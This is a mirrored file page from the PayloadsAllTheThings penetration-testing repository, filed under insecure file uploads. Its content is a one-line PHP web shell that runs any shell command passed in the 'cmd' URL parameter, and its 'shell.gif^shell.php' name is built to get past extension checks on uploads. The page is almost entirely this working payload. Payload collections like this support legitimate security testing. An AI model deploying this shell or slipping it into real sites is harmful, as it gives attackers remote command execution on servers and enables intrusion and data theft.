1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 21:41:14 +01:00
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.gif^shell.php

2 lines
44 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>